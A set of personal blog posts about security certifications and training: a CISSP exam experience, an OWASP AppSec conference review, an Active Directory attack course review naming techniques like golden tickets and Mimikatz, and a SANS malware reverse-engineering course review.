  • It’s now about mid-February and a blessing falls from the sky directly into my lap. I find my MOST valuable resource: Discord CISSP Server (12/10). This type of forum was perfect for most of my learning when tackling technical certs so I knew it would push me here. We’re equally amazing but there’s some unmatched wisdom in there for sure! This drastically improved the amount of information you retain as well as increased the depth of such information respectively. I think this is the case because you’re not just you in your head alone in your room with a book. You’re now defending your argument on a particular question, or understanding why you’re wrong, and this goes on 24/7 since the group is global. 4 pm EST or 4 am there’s going to be active discussions ALWAYS going on. There’s a psychological aspect to this as well. Feeling like you’re alone in a fight is depressing. Having an active army of mission-oriented soldiers all ready to fight, defend and operate 🔫 ?! Oh now this is a whole different story! Don’t underestimate the power of a topic being explained to you by a person instead of a blog post. I’ll forever be a part of this channel – definitely my new brothers and sisters. Blame most of me passing on them!
  • I start to do a million practice questions from anything I could find: books, practice sites, old materials. I guesstimate I did over six thousand practice questions. I can remember off hand doing 1300 in a 2 day hiatus 🧾 At this point I’m at about 5 hrs a day on weekdays and at least 12+ hrs on weekends #overdrive
  • Sari Greene’s CISSP (9/10) course. Decided to change the pace a little bit. This was awesome, very helpful, with the most important thing being she delivers the material with a strong risk management undertone. Another thing was how she aligned the entire course based on the sections in the CISSP domain outline. Gets a ding since the material is about 5 years old so it misses new information about some of the topics, like IoT, SCADA and embedded devices. Recommended.
  • Mike Chapple LinkedIn Learning CISSP (9/10) course. Very good! The course is taught in a way that isn’t typical of what you’d expect in a CISSP course. The way he provides practical realizations of the topics to seal it in is incredible. You can remember PGP until the cows come home, get hit with a question and totally only know that PGP stands for Pretty Good Privacy 😂 memorization won’t help you in the exam. He shows you real-life implementations of the exam topics. Wonderful course.
  • After I finished all those I started from domain one and did the following for all 8 domains
    • Read Sybex chapter summary
    • Read 11th hr chapter summary
    • Watch Sari domain summary
    • Do Mike Chapple practice questions for associate domain
  • We’re at about 2 weeks out now time wise. I started to read all the NIST documents related to the major processes in the various domains. These actually were well written and I learned to love them. Every night I would open them and try to relate everything I was doing back to risk management. I’m still doing practice problems but maybe like 10 a day at this point. Most of my time is spent trying to understand the SDLC in depth, the IR process in depth, the BCP/DR process in depth. You not only need to understand the order of the processes but all the details & outputs that come from each.
  • (Maybe one month ago 2 member of the squad from Discord discovered we all have the same exam date) The day before exam I get hit up to join a conference with both of them to do so last day studying. Without this I wouldn’t have passed. We spend 10 hours going over all the major processes, ironing out our understandings and tying relate everything back to the RMF. It’s 10 pm night before exam and boy I’m thinking I probably shouldn’t have did all of that studying today in fear of cramming and losing it. I’m also pissed at myself for drinking a redbull 30 minutes earlier. Because I should be sleeping but a hr has gone by and I’m still wide awoke – I hope I get to sleep soon in fear of not getting good rest and failing.

Part-3: You Didn’t Do All This Work For Nothing, Did You?

Time: Mid-March 2020

When I scheduled my exam I purposely chose a Saturday morning. I did not want to deal with the variables that a “normal” morning commute might include – so I was going to be lazy and Uber to the testing center. Now, being so paranoid, I just drove there and paid the crazy fee to park in the garage. I listened to Kelly’s “Why You Will Pass The CISSP” video and Larry Greenblatt’s “CISSP Exam Tips” videos before leaving the car. Crazy only seeing about 4 people, when on a regular day a low amount normally would be around 50-100 and tons of traffic at any given time – people jogging, women pushing strollers, people and their dogs, as well as tons of business folk – it’s directly across the street from a train station.

At this point, the sports reference is to boxing. Here are my thoughts walking from the garage to the exam center – “You did not come this far to lose, did you? You’ve been wrong countless times on Discord and understood why. You worked your buns off! You learned the material, the mindset, you’ve watched hundreds of videos, did thousands of questions, read tons of pages. You’ve got some of the most distinguished practical offensive certs in existence; are you going to let a multiple choice management exam that most people fail because they don’t slow down to read defeat you? You’re going to knock this exam on its face. You already envisioned this day many times before. This is going to turn out just like all the other times – you put in the work and the results are going to prove such is true at the end. If you synthesized the information the way you think you do, you’re going to do amazing.” This is how I’m trying to make myself feel.

In reality I’m scared as shit about this exam 😂 it’s not that I don’t know the material – it’s that I don’t know what I don’t know. Most people on Reddit say when they see the first 25 questions they sometimes wonder if the proctor configured them for the wrong exam 😌 Here’s what calmed me down and sorta grounded me. I had small talk with a guy as we were walking to the bathroom and we asked one another what we were up against this morning. Turns out he, along with 90% of the other people there (16 total), was taking his medical exam. It was 7 hrs! I literally said to myself “Shitttt boy you got it good!” 🤣 It’s all relative 💭 My number gets called and I get seated for the exam. They had disposable covers for the noise-cancelling headphones 🤞🏽

I had this plan to write all my brain dump stuff on the pad they gave me before starting. You get 5 minutes to read and sign the NDA. One of the things I wanted to write down was the forensic process. I started to list them out and got stuck after the “Collection” phase – it scared the living fucking daylights out of me. I said “F-This” and clicked “Start Exam”, true story 🤦🏽‍♂️

Part-4: Put Up Or Shut Up!

The questions didn’t seem like they were designed to trick me. I was comfortable with the terms in most questions. The difficulty is in the subjective and vague nature of all the questions. Unlike the practice questions, which test if you know terms and definitions, the exam places you in scenarios where you play from the perspective of a security manager and have to apply sound risk management principles – remembering your job is to reduce risk, provide information for senior management and apply the appropriate level of protection to your assets depending on their value and classification. Most of the questions are BEST, LEAST, WORST with all the possible choices either being all right or all wrong. On a bunch of occasions I was able to eliminate 2 off the jump. The remaining 2 choices are what’s going to keep you up at night. I got a crazy subnetting question that I attempted to start breaking down on my pad to binary and do the powers of 2; after 20 seconds I said “F – This” and clicked “Next“. There were some gimmes sprinkled in there as well. Don’t forget “inch deep, mile wide”; it’s way too much material for every single question to be a boulder. I made sure to slow down, scrutinize every word in the questions, re-read all questions and answers and read back the answer I chose. If a question was “Blah blah blah .. Which of the following features of Digital Signatures would BEST provide you with a solution to prevent unauthorized tampering?” … And the answer is integrity … Before moving on I’d say “Integrity is the feature of Digital Signatures that best provides the solution to the problem” … Here’s what I saw most, followed by a question to illustrate the context for each one:

  • SDLC Related – What SDLC phase is Change Management most likely to be a part of?
  • BCP Related – A global pandemic of a deadly virus is on the brink. How does the BIA help you determine your risk?
  • IR Related – The sky is falling and something just hit you in the head. What process of IR are you most likely in?
  • Bunch of stuff on Access Controls – How can I best protect this if that?
  • One question on Encryption – Understand PPP, L2TP, PPTP, L2F, their succession, and which ones can use IPSEC, EAP
  • Bunch of Risk Management – Something just happened, you need to do something, with these constraints. What’s best?
  • Asset and Data Classification/Security – Why do we classify anything?
  • Web Application Attack Recognition – Seeing and recognizing attacks described through a scenario or graphical depiction
  • US and Global Privacy Frameworks – GDPR – ECPA – OECD
  • Roles and Responsibilities – Who’s MOST important for security? CISO, CEO, ISM, ISSO?
  • Communication & Network Security – What layer is LLC most likely a part of?

I was nervous as hell clicking “Next” on the 100th question. I knew if the exam ended I either did really well or really horribly; also, if it continued I knew I was exactly on the borderline and could still pass up to 150, but each question would have to be correct. If that was the case I wouldn’t have been pissed, but I didn’t want that to occur, to even have to be in that situation. The exam stops. I’m like “HOLY SHIT”. I get the TA’s attention, she signs me out and I go to the reception area to get the print-out. The receptionist was at the bathroom 😫 had to wait 5 minutes for her to come back. I was pacing so much the entire time I probably could have burned a hole in their damn carpet. The lady takes my ID, prints out the result, peeks at it, folds it and gives it to me looking me dead in the eye with a straight face. But I did notice it was one piece of paper, and people said if you get one paper you pass – if you get more it’s because you failed and that’s the explanation of the domains you came up short in. I opened it and saw I had PASSED 😍 I threw the wildest air punch in history, luckily didn’t hurt myself, jumped up and down a little (nobody else in the reception area at this point), said “LET’S GO” as loud as I could (since the students are literally just around the corner) and noticed the receptionist now smiling, so she said “Congratulations, sorry I had to mess with you” 😂 Here it was, guys, that moment of passing that I envisioned! Slaying the dragon. What a wonderful feeling 💘

Part-5: Thoughts?

If you’ve made it this far s/o to you! I’ll never write a TL/DR ever ✌🏽 The context matters … The journey matters.

My biggest advice would be to make the NIST RMF, SDLC and all the related documents your friend. These are going to help you substantially more than doing a zillion practice questions or reading the huge books. It also sheds light on why so many smart technical folk fail this exam the first time. The day before the exam, @Beedo, @Reepdeep (MAJOR S/O TO THOSE GUYS – WHO ALSO PASSED THE SAME DAY) and I studied from 1 pm to 10 pm going through all the processes from each domain, in our own words, understanding the steps of each process but also understanding how every single thing is tied back to risk management.
NOTE: We think the document we created could help everyone out there as a definitive source for passing the exam. Obviously folks need to get back to real life and the people they’ve neglected since beginning the journey, but it’s something we all feel strongly about and want to provide to the community hopefully soon 😎

Part-6: Things I Shared on Discord That I Think Should Be Included Here?

These are just excerpts, but I figured they may be valuable since you forget basically everything related to the exam afterwards.
Bear with me as the grammar may not be perfect; it’s Discord, so I’m not necessarily caring to correct a mistake if I make one. It’s conversational, texting-like language, most of it typed from my phone.

In regards to the difference in seemingly all the practice material vs real exam:

“I see why all the practice material misses the mark. It’s because you truly need an intelligent person to be able to spend the time to make those questions, and that person costs too much to write free questions on the internet for us .. Those aren’t ones you come up with based on a definition .. You understand someone thought deeply about this, so much so they knew the answer I’d immediately go for (and it’s wrong) is included as, say, answer A and made the right answer further down the list like D. You need to be very careful. Also saw 2 similar looking answers where, if you jumped immediately to the answer and didn’t thoroughly read it, you would not have noticed that the 2nd one further down was more right”

In regards to our day before exam study conference: 

It was impromptu as hell; I was just going over each of my Boson question explanations. It lasted a lot longer than expected 😵🥴 went from like 1-10 yesterday on conference, went over each process, understanding it and connecting the SDLC steps and BCP steps back to RMF. I’m sure they’ll agree understanding how everything relates back to RMF is the way to pass. Not technical … Not all the questions … Since they’re way too technical (use em to identify and reinforce your weak areas) we were already studied up at that point … Sybex/Boson/AIO/all the sources’ questions are way too hard if we’re talking scope for the exam. You’ll be placed in a bunch of situations where you’re somebody in security: what’s the BEST/LEAST solution for this scenario.

On depth of questions and context. Keep in mind we already knew the block lengths, key sizes, etc.:

For context it’s like understanding AES is a strong symmetric algorithm, DES is a weak one that shouldn’t be used. But not that 3DES EEE has a xyz-bit length and it goes through xy rounds – the latter is unnecessary .. If you know it so be it, but that’s how I would scope everything. High level, and how does it connect back to RMF .. I would read the RMF and SDLC NIST docs every night

On what I think is useful studying:

I’m saying you’ve read Sybex or another big book, feel comfortable, been browsing Reddit, know the sources, the videos and all the questions we do here, then can go through the 11th hr and understand everything; then I would focus on the processes and how they relate to RM: SDLC, IR, BCP. Knowing how those relate was my entire exam. I had a bunch of SDLC stuff, a lot of OWASP “what vulnerability is this?”, a few questions from domain 4: IPSec and understanding the protocol or layer.

Overall exam tips and thoughts:

“The exam was tough, but I didn’t feel at any point they were trying to trick or deceive me; for every question I was able to eliminate two answers off the bat. Some of the answers are similar, then you figure out the differences, which was slightly hard in some cases, some not. Felt familiar with all the terms and answers. Questions were clear. I didn’t even notice the experimental ones, which I was on the lookout for. I think when studying we equate inch deep, mile wide to difficult. In reality it’s just understanding how the domains work together. Remember every question CANNOT be a boulder. There were some gimmes… what is encryption… what is integrity for digital signatures type stuff. My best advice in hindsight with the above is DO NOT WASTE YOUR TIME doing all these questions, Boson, Ccure, Luke, Sybex. All of them! Only if you’re weak. If you can read 11th hr and notice everything, nothing’s a shock, stop. Understand how everything is bound by risk management. Btw I didn’t use the whole mgr mindset, I just tried to pick the best of the 2 remaining options. There were plenty of answers that were “doing something”; I threw those out automatically”

On how I would study differently:

“Don’t worry and spend some time in the NIST documents 800-64 and 800-37; they all link to each other. So your thinking going through, say, SDLC is: what am I doing in this step and how does it relate back to the RMF? Everything relates back to it. For example, in phase one of the SDLC you have your requirements and stuff, but you’re also initially understanding the system, which links back to step one in RMF which is Categorize, so think: does this system store, transmit or process PII, what’s the risk? Or step two, Development in SDLC: you know you’re starting design, architecture, development and testing; that relates to steps 2&3 (you also do risk assessment here) in RMF. You’ve identified the need for the system in the initial requirements, so now in development we select the controls of the system and assess them. That’s in SDLC phase two, but you’re always grounded by RMF. See how that relates? I think that understanding this alone is how I passed”

Are questions from sybex syllabus or out of the box?
Way too technical, as are all the practice questions

Some people fail who had Boson?
Boson shouldn’t be used to judge readiness, just to identify weak areas. You could get 20% on all Bosons and pass since it’s mostly thinking, not technical

How’s the difficulty level?
NOT DIFFICULT – DON’T BELIEVE THE HYPE – ALL OF US COULD PASS THIS EXAM

Do we need other sources of study in hindsight?
Read the NIST documents on all the processes and reclaim some of your time back

You say everyone in this group can pass; can you tell your experience and main domain?
Mainly offsec, and I do appsec at work for like 4 years. I’m an engineer so I have the fix-it mindset by default. You don’t need to be an expert in anything. Just thinking of everything in terms of risk mgmt is enough to pass

How long have you been preparing?
Studying since 1/28

What was the difficult domain for you?
Domain 2 smh – Focus on 1, 3, 7 though and definitely 8.. Obviously you need to be passing in all domains, but since those are weighted more it’s more advisable

Did you face any language-mixing puzzle questions, meaning they use different vocabulary?
There were NO gimmicks; every question I knew exactly what they wanted.

Do you think people from a different industry find it more difficult than security people?
It’s your understanding and mindset. Kelly and Larry tell you the mindset. I automatically threw any answer out that was “disconnect from network, make a firewall change”.

Did you feel it’s purely management?
No. Because being in mgmt, although you’re not a doer, you need to have a solid understanding of the underlying area no matter what it is.

S/O to my Discord guys ALL OF YOU 💗

I’ve included a section below on the links that were most valuable to me. Good luck & NEVER give up or give in!

Part-7: Links


The post Slayed CISSP appeared first on Certification Chronicles.

OWASP Global AppSec DC 2019 Review

23 September 2019 at 18:05

🙋🏽‍♂️ Hello friends! It’s been quite some time since I’ve blogged – shame on me. No excuses as I can’t say I’ve been particularly busy or engaged in anything mind-blowing. The truth is I haven’t had much to write about lately & I’m not going to deliver nonsense because then I would lose your trust. I err on the side of quality vs. quantity as I hope everyone reading this does. My quest to become a better developer is something that has been keeping me occupied lately. To that end, learning MEAN stack development is something I really want to get better at. How can I understand how to break something if I don’t know how to build it? It’s in its infancy but my goal is to build a vulnerable MEAN stack application and release it to Github for everyone to tear it apart and understand how the typical web application vulnerabilities manifest themselves in a MEAN stack application at the code level. No promises but I hope by the end of the year I could deploy the beta version. Enough updates let’s get down to the point of this post.

Having an awesome company isn’t something to take for granted. For me this means quality and diversity of work, culture, work environment and plenty of things in between; but the biggest part of that is the investment the company provides you in terms of self-improvement and development. To say that I get spoiled currently is an understatement! Imagine how ecstatic I was to find an OWASP conference that was so close I wouldn’t even need a flight. I usually, with puppy eyes, ask my boss if it’s possible to attend, he runs it up the flag-pole and soon gives me the okay to book it. This would be my first OWASP conference & training. The first 3 days there was an assortment of trainings, followed by the last 2 days being the actual conference and a CTF. The training course that caught my eye was Seth & Ken’s Excellent Adventures in Code Review. The description read as follows:

This was tough to select since there were trainings on a bunch of things I was interested in, including Serverless Security, API Security, Security in Single Page Apps, DevOps Security, and Building an AppSec Program with OWASP. I wish I had like 5 clones and could take them all, but such is life. I arrived Sunday night 9/8/2019 after a 3-hour train ride, grabbed some food and made sure to get a great night’s rest.

Training:

After an introduction from the instructors we were provided a USB (which proved to be safe, but everyone questioned it) to download the materials. It included an OVA image of the VM we were going to utilize for the course. Essentially it was just an Ubuntu image pre-loaded with the vulnerable applications’ source code and the Atom IDE, which is pretty slick. A giant portion of this day was determining the scope of code review and building a methodology. Having a solid methodology is uber important, since being given millions of lines of code to review for an unknown application, in various frameworks or an unfamiliar language, can be a daunting task. A question I’d always ask myself is “where do I begin?”. We learned how to perform an application assessment & overview. This is the first step, where you profile the application, beginning to understand things such as:

  • Frameworks & Languages
  • 3rd Party Components
  • Techstack
  • Datastores
  • Checking Framework Documentation
  • Looking for Unit Test
  • Code Comments

Spending the time here proved most important and the most difficult. Naturally the hacker in you wants to start hunting for vulnerabilities and going down rabbit holes. Don’t Do This! Be disciplined is the only advice I can give you here.

Then comes information gathering:

  • Mapping Routes and Endpoints
    • We learned how requests flow from routing to authorization functions and processing logic, through the DB and back to the user, in a number of frameworks:
      • Rails
      • NodeJS & Express
      • Django
      • .NET
  • Reviewing authorization decorators
  • Risk brainstorming
  • Sources and Sinks

From this you’ll have a checklist of things to review. That’s the methodology!
Using the information from above we dove into specific areas of the application (which in itself is sorta difficult to find).

  • Authorization
    • Broken Access Controls
    • Sensitive Data Exposure
    • Mass Assignment
    • Business Logic Flaw
  • Authentication
    • Broken Authentication
    • User Enumeration
    • Session Management Issues
    • Authentication Bypass
    • Brute Force Attacks
  • Auditing
    • Sensitive Data Exposure
    • Insufficient Logging & Monitoring
    • Debug Messages
    • Error Handling
    • Information Leakage
  • Injection
    • Injection
    • XXE
    • XSS
    • Redirects
    • SSRF (recently popular I wonder why)
  • Cryptography
    • Lack of Encryption
    • Improper Encryption
    • Insecure Token Generation
  • Configuration Review
    • Security Misconfigurations
    • 3rd Party Libraries, Frameworks, Dependencies

After lunch on the last day we broke off into groups, selected an open source application and followed the process from start to finish. We were hoping for some CVEs, but we didn’t come up with anything shocking. I love when you have practical sessions like this. You’d be surprised how much you learn by doing instead of just listening. All the groups presented their findings to the class at the end.

Conference:

The keynote started off with a pretty amazing guy, Neal Ziring, Technical Director of Security from the NSA – Applying Security Engineering Principles to Complex Composite Systems
Here are some of the talks I attended:

  • A Structured Code Audit Approach to Find Flaws in Highly Audited Webapps
  • Using the OWASP Application Security Verification Standard 4.0 to Secure Your Applications
  • Securing Serverless by Breaking-in
  • Owning the Cloud through SSRF and PDF Generators
  • DevSecOps: Essential Pipeline Tooling to Enable Continuous Security
  • The As, Bs, and Four Cs of Testing Cloud-Native Applications
  • OWASP Serverless Top 10
  • Farewell, WAF – Exploiting SQL Injection from Mutation to Polymorphism

Final Thoughts:

I really enjoyed my first OWASP Application Security conference. In addition to all the technical knowledge gained, I always try my best to network and interact with as many people as possible. I can see myself definitely attending again in the future. There was tons of swag being given away, t-shirts, socks, gadgets, you name it. I didn’t participate in the CTF because it ran during the same hours as the conference. That was weird because some people solely did the CTF and didn’t see the talks at the conference. I wish it was more SANS-like, where it’s after hours, but such is life.

Best Part:

The best part is literally all the slides, handouts, cheat-sheets are available online! This was so appalling to me I asked them why it wasn’t a locked resource or something password protected. The answer was, “If you can get all the value you need without us teaching it we’re useless”; in addition, we want you to go back and share the information w/ your teams and colleagues. This is the differentiator: OWASP is here to protect the masses and knows we are more effective being collaborative and sharing knowledge. I think that was pretty special! So here you are – the github with all the materials, source code and lecture slides! Cheers.


PentesterAcademy Attacking and Defending AD Course Review

16 June 2019 at 16:07

Lately I’ve been more busy than usual. Getting my business off the ground, work, life and other things. I’ve got to get to all the messages & of course say THANK YOU for all the well wishes and kind words. By now you probably know that even with all that going on, my free time is selfishly spent exclusively on myself 😈 The course I’m referring to is here: Attacking and Defending Active Directory by PentesterAcademy.

Why’d You Even Decide To Take It?

Good question that I feel the need to spend some time on. No exaggeration, hundreds of people hit me up asking for advice on certs. Since I’ve never necessarily chased a cert for a new position, promotion or anything like that, my stance may not reflect everyone’s exact situation. All my certs came from just wanting to gain the knowledge that the cert provided in my quest to get more diverse and deeper into the different security domains. Of course I try to be targeted, going after the most distinguished, the most reputable organizations, but really, after completing the course and obtaining the cert it’s a little sad to me 😟. That’s when the fun stops. I encourage you to just continually challenge yourself and see if you have a breaking point. There’s always time. Being frustrated at yourself while stuck trying to comprehend something new that’s complex is ammo for the brain. I love learning, double points if it’s something totally new. It’s like I can feel the new neural pathways in my head growing. I’m always stuck. I’m always reading things 3 times over, but I bet you I won’t continue until I completely absorb what I’m reading. Fight the good fight and be better than you were yesterday. Live by it.

After I passed GREM I was in a somber mood, similar to how I feel after every cert when all the happiness wears off. Sometimes as soon as the car ride home a question creeps into my mind and it doesn’t go away. “What’s next?” Giving you guys some context, I mainly do Application Security for work. My goal is to be a specialist in a few things and a generalist in many. You know what I don’t have? Red-Team experience (besides the basic definition) and absolutely no knowledge of AD (okay maybe a little). I continued thinking wth 😏 how’s that even possible? Then I thought most of my hacking is through flag-based scenarios and courses. If you’re compromising a user you’re typically exploiting a service, process, or application running in the context of that user. Once I started researching things like lateral movement, exploiting trust relationships between domains, abusing ACLs, I was sold. That was my motivation to pay for the course. Oh yeah. It was $250 HA! For the value this is EASILY the best course I ever enrolled in 👏🏾.

What Was It Like?

Incredible! Continuing on “value”, I received 36 course videos, a copy of the video slides, a lab manual, 30-day access to their AWS AD environment, and a sizable zip with all the course tools. Each video taught a topic that had questions attached to complete in the lab. This is where you really learn! I watched the videos in order, learning from the awesome instructor Nikhil Mittal. I was amazed at the comprehensiveness. It was just what a noob like me needed. Things like:

  • Lateral Movement
  • Significant time spent on Domain Enumeration
    • Bloodhound
    • Powerview
    • Mimikatz
    • Powercat
  • Local Privilege Escalation
    • Powerup
  • Domain Persistence
    • Understanding Kerberos Environment
      • Golden Tickets
      • Silver Tickets
      • Skeleton Keys
      • DSRM
      • Custom SSPs
      • Admin SD Holder
      • Abusing ACLs
  • Domain Privilege Escalation
    • Kerberos
    • Constrained & Unconstrained Delegation
    • DNSAdmins
    • Enterprise Admins
  • Cross Forest Trust
    • krbtgt hash and SID history
    • Trust ticket

After I watched the videos the second time I started to do all the tasks in the lab environment. Since I get obsessed with new things I was rushing home to get into my lab environment every day, spending usually from say 5-10 PM every day practicing. It took about 2 weeks to finish all 23 tasks. I’m feeling pretty good about things at this point. It’s dumb to feel this way honestly, since everything is brand new to me I feel as if my knowledge is procedural. Meaning if I was tossed a curve ball and things deviated slightly from what the course taught I’d easily be toast. So I select the positive side and congratulate myself for grinding for going on 1 month straight with the course. Although I studied for over 3 months straight on other certs I still pat myself on the back for a concerted effort on anything. Hey! If you don’t want to clap for yourself, don’t. Now I go back through the entire course seeing if there’s anything that catches me off guard or feels fuzzy and I review it. Let’s do this! #schedulesexam 😲

Exam #1

The exam drops you into an Active Directory environment as a low-privileged user. Your goal is to gain code execution on 5 of the boxes in 24 hours. I started out pretty good, gaining 3 users and 2 boxes in 4 hours, and then came hell. One part that stank was some of the tools used throughout the course didn’t necessarily work in the exam. In the course we used plenty of PowerView, Mimikatz, and Microsoft’s AD module. Anyway I enumerate the entire domain, run Bloodhound, do everything and can’t figure my way forward. I stay up the entire 24 and come up dry. Didn’t bother submitting an exam report 🤒.

Exam #2 (1 week later)

I spend this week reviewing videos on enumeration. I don’t know why, but I felt I missed something simple. I start off the exam and gain all the privileges that I left off with. I run Bloodhound again, after that checking things like sessions, group membership, outbound ACL control. It’s then that I realize I missed something that wasn’t even hidden 🔎. I think back to myself, how could I have missed this? It was right there. Then I understand what happened. (Always try to think, if you come up short on anything – what went wrong and how could I not make that mistake again.) So while I was enumerating, one of the tools missed it; luckily, since Bloodhound shows similar information, I saw it there. I was PUMPED 🙌🤳 at this point. Not to mention I got this like 30 minutes into the 24 hours. I begin pivoting through the domain gaining users and more boxes. 3 hours later I get Domain Admin and dump all the hashes in the domain. Game Over. I create an inter-realm TGT and gain code execution on the forest domain controller. Finished the report in an hour, proofread it – sent it off. 8 hours later I get the following

Dedication Wins!!

And a few hours after that I receive the following along with a personal email from the instructor himself. Geeked about that 😎. Again, there’s always time.

Overall this course was amazing. A couple things I loved?

  • How the exam seemed to stretch you and isn’t easy. You’ll learn a lot of new things in the exam itself.
  • The responsiveness and helpfulness of the Active Directory Support Staff. I constantly bothered them with any questions I had. You can’t beat it.

As I’m typing this guess what’s going through my mind. “What’s next?”

The post PentesterAcademy Attacking and Defending AD Course Review appeared first on Certification Chronicles.

GIAC Reverse Engineering Malware (GREM) Review

28 April 2019 at 22:01

New trophies !!


Welcome back. What follows is my review of the SANS FOR-610 GIAC Reverse Engineering Malware (GREM) course led by the magnificent instructor Lenny Zeltser. I intend to not only give you a day-by-day breakdown but also my thoughts, mindset and overall sentiment. But before all of that let’s rewind to Jan 2019.

Fresh off of nailing OSCE I was desperately searching for something to latch onto. Could you imagine how big my eyes were when my boss informed me I would be able to take a SANS training 😲. I felt Malware Analysis would complement my Exploit Development experience and in addition make me more valuable at work. Studying is baked into my life; I never foresee this ever changing. I love to learn. I love to struggle. The dedication. The discipline. The concerted effort. I love the internal fight I always have with myself. Did I mention this event was in Orlando!? So the day of my flight comes and I’m freaking pumped!

The 3 hour flight was fine, landed safely, had to strip out of the hoodie because it was about 75 degrees & sunny. Checked in, received all the course materials and some swag. Grabbed a bite to eat and tried to get a good night’s rest. I could barely sleep, like a kid on Christmas Eve.

This swag is not for sale!

Day 1 – Malware Analysis Fundamentals

If you’ve never (sorry to hear that) been to a SANS training, you get a book for each day that you work through. We were provided with 2 VMs, one Windows and one REMnux (Lenny created and maintains this; it’s a stripped down Ubuntu system pre-loaded with all the tools. Once again, if you want a recurring theme here it’s that he’s awesome & very intelligent). It’s quite intense as you get bombarded with tons of material. After a short introduction he jumps straight into the material. We discussed what malware is & the general goals we wish to accomplish with our analysis. Some things that won’t make the sexy list but were important were how to build an analysis lab and how to create and deliver an analysis report. Now is when the cool things begin to happen. “Okay class, go to the malware folder for day one and double click on it to begin analyzing your first piece of malware”. I’m like this sounds like a mistake 😂 but let’s do it! We got pretty intimate with this piece of malware, analyzing it statically, dynamically and with a tiny bit of code reversing in IDA. This malware had C2 functionality & dropped an encrypted config file on the system along with persistence. Here are some of the tools we’d come to use for today and the remaining days

  • PE Studio
  • Strings/pestr
  • Process Hacker
  • Process Monitor
  • Regshot
  • Wireshark
  • IDA
  • x64 debug
  • fakedns
  • inetsim

After class let out for that day I grabbed a bite to eat and decided to crash instead of going for one of the evening talks.

Day 2 – Reversing Malicious Code

This day I heard was most feared depending on your background. I actually enjoyed it a lot. The entire day was spent inside IDA and looking through the assembly. Some things we learned this day were

  • Intel Processor
  • Registers
  • Pointers
  • Memory Addressing
  • Branching
  • Calling Conventions
  • How functions work
  • The Stack
  • Control Flow

The 2nd half of the day taught us how to recognize common API patterns in malware: keyloggers, downloaders, droppers, etc. There was a tiny section on 64-bit code analysis that we didn’t spend much time on. I didn’t go to any evening talk; I crawled into bed and reviewed the day’s materials.

Day 3 – Malicious Web and Document Files

This day was my favorite. If yesterday beat you up, this day was here to pick you back up. It wasn’t easy, it was fun. Since this is the way that most malware is introduced inside organizations I was very interested in this day’s topics. It didn’t disappoint me! We saw so much naughty malware this day. We started out deobfuscating scripts using browser debuggers, and then using standalone interpreters. Again things are intimate here, so you’re learning the internal format down to the nitty gritty of the different document types and the tools you use for analyzing them. There were malicious PDFs, Office Documents (Macros), and RTF documents. What blew my mind this day was the amount of ways that JavaScript can hurt you. And why Windows has binaries to execute JavaScript. I guess being naive I simply thought about JS and what it could do inside the browser. Some tools we used this day were:

  • js (SpiderMonkey)
  • pdf-parser
  • base64dump
  • oledump
  • olevba
  • xor-kpa
  • rtfdump

After this days class I was excited to see what this NetWars hype was all about. So when the time hit I grabbed my machine & headed down.

The atmosphere was incredible 👍❤ being in a room full of hackers and us going head to head. There’s nothing else like it. There was a guy who had over 400 points when the next highest guy had like 50. They took his name off the board because they said they “Didn’t want to depress us anymore” 😂 That guy was insane. I did well actually; it was a lot of Linux commands and Wireshark analysis. The part that tripped me up was image analysis; I struggled with this and lost so much time. I fell from 4th to like 20th by the end of the first day.

I’m on the board!

Day 4 – In-Depth Malware Analysis

We learned a ton of stuff this day. Recognizing and unpacking malware. Debugging packed malware. The 2nd half of the day we learned about and examined a fileless piece of malware. It was wicked! Some topics in the 2nd half of the day were API Hooking and Code Injection. We also spent time learning a little bit of memory forensics. Some tools we used this day were

  • upx
  • scdbg
  • volatility

I decided not to go to the 2nd day of NetWars. Went on a walk exploring the area where our hotel was and chilled by the pool.

Day 5 – Examining Self-Defending Malware

Awesome day spent learning about malware that fights you back or purposely makes it difficult to analyse. We learned about Process Hollowing and the usual techniques malware authors employ to detect debugging. Some tools used this day were

  • brxor
  • bbcrack
  • floss
  • scylla

Last day of learning & it’s Friday, but who cares because I’m spent. Went to the room and crashed.

Day 6 – CTF

Get to class at 8:30, set up my machine, grab my Redbull and prepare for the fight. There were about 20 people in the class and most of them seemed very intelligent. I knew a few of them were full-time malware analysts, but it’s always fun to see where you end up when competing with others. I enjoy the competition. So the CTF was everyone on their own, no teams, and the top 5 people win coins. We had our own scoring server that updated in real time as you earned points, so it was intense. For 5 hours we leveraged what we learned to answer questions about different malware samples. Now when we first started on Monday I had to think about everything because it was all new to me. On this day I remember running to the bathroom and thinking damn! You’re not even thinking about this, you’re just doing it. Gave myself a bro hug. When the dust settled I had a coin & it was the perfect icing on the cake.

I win !

Studying For The CERT

When I flew back home I immediately reviewed each book. I don’t create an index, but I use the color tab thingies to mark sections I think are important and also highlight anything relevant, of course. The end result of this madness looks similar to this

This was like retaking the entire course; it really helped me reinforce topics I knew I was weak on. It also helped me understand where things were in each book. This is valuable because although the exam is open-book you don’t have much time to search for things. After this was done I got access to the MP3 recordings. I listened to all of them in the car, on the train, at lunch, and in the evening; this was the only thing I did. I went to sleep to Lenny’s voice and woke up to it. This again was like taking the course again and it helps tremendously. In between this time I also took the 2 practice tests they give you. I scored a 76 on the first one and 84 on the second one. It was great to have an idea of the type of questions. So I originally scheduled the exam for a Saturday. At this point I felt like I had taken the class 3 times and gone through the books like a zillion times. It was Thursday night. I said forget waiting until Saturday, you’re taking this exam tomorrow. Luckily the testing center had availability and I rescheduled it. After I did it I thought “You’re a fucking fool” 😂 But let’s do this!

The Exam

Wake up, gather my materials, buy a Redbull and a water and off I go. I gave myself ample time to get to the testing center; I absolutely can’t be late. I got there 1 hour early at 8 AM and they allowed me to take the exam immediately. Astonished that I couldn’t bring my Redbull into the testing area, I downed it. Testing at a center is so funny because you can’t have anything besides your materials; all your belongings get stored in an assigned locker. They made me lift up my hair and pants legs, I was like WTF 😂 those folks would make awesome TSA agents. The exam was HARD but I felt prepared. I finished it in 1 hour and this is what it ended up as

Let’s Go!

I was soo proud of myself! ✊🏿
And when you get 90 (90.7 counts😂) or higher you get an invitation to the GIAC Advisory Board.

I encourage you to take the class if you can but only if it’s with Lenny. He answered 1 million and one of my questions & he gives off good vibes.
Take care guys – until next time.

The post GIAC Reverse Engineering Malware (GREM) Review appeared first on Certification Chronicles.

The Usual Suspects – Malware Snippets – Part 1

12 April 2019 at 21:20

When You Should Be Studying But The Code Calls You.

Prologue

